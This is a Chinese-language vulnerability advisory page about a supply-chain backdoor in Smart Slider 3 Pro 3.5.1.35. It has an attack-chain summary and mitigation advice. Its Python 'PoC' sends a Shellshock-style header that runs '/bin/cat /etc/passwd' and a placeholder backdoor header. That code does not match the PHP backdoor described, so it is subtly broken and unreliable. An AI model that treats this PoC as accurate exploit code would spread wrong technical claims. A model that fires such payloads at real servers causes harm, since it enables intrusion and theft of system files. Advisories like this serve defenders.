CVE-2026-34424 CVSS 9.8 严重

CVE-2026-34424 Smart Slider 3 Pro供应链后门漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34424

漏洞类型

远程代码执行/供应链攻击

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Smart Slider 3 Pro

漏洞概述

Smart Slider 3 Pro 3.5.1.35版本存在严重的供应链安全漏洞。攻击者入侵了更新系统，在插件中植入了多阶段远程访问工具包。未授权攻击者可利用特定的HTTP请求头触发预认证远程代码执行，进而建立后门、窃取凭证并维持持久化访问，该漏洞影响WordPress和Joomla平台。

技术细节

该漏洞源于受损的更新机制，导致恶意代码被注入到Smart Slider 3 Pro的核心文件中。恶意代码监听特定的HTTP请求头，一旦检测到攻击者发送的特征值，便会在服务器端解密并执行传入的任意PHP代码或操作系统命令。此外，恶意软件具备持久化能力，通过修改must-use插件或核心文件来创建隐藏管理员账户，确保护杀后仍能维持控制，实现凭证窃取和数据外发。

攻击链分析

STEP 1

供应链投毒

攻击者入侵Smart Slider 3 Pro的更新分发服务器，将包含恶意后门的代码植入3.5.1.35版本的安装包中。

STEP 2

恶意安装

用户在WordPress或Joomla后台通过官方更新机制升级到受感染版本，导致服务器被植入多阶段远程访问工具包。

STEP 3

漏洞触发

攻击者向目标服务器发送特制的HTTP请求，请求头中包含特定的触发标识和恶意载荷。

STEP 4

代码执行

后门代码解析HTTP请求头，提取载荷并在服务器上下文中执行任意PHP代码或系统命令。

STEP 5

持久化与渗透

攻击者创建隐藏的管理员账户，修改must-use插件或核心文件，确保护杀后仍能维持访问，并开始窃取凭证。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the compromised WordPress/Joomla site
target_url = "http://example.com/"

# Malicious payload to execute PHP code (e.g., phpinfo())
# The specific header may vary (e.g., User-Agent, X-Forwarded-For)
headers = {
    "User-Agent": "() { :; }; echo Content-Type: text/plain; echo; /bin/cat /etc/passwd;",
    # Or specifically crafted header for this backdoor:
    "X-Malicious-Header": "base64_encoded_php_shell_code"
}

try:
    response = requests.get(target_url, headers=headers, timeout=5)
    print(f"Status Code: {response.status_code}")
    print("Response Body:")
    print(response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

Smart Slider 3 Pro 3.5.1.35

防御指南

临时缓解措施

建议立即禁用Smart Slider 3 Pro插件，阻断对更新服务器的网络连接。检查服务器访问日志，查找包含异常HTTP头的请求记录，以确认是否已被攻击。由于涉及供应链污染，建议对受影响系统进行完全重新部署或深度取证分析。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表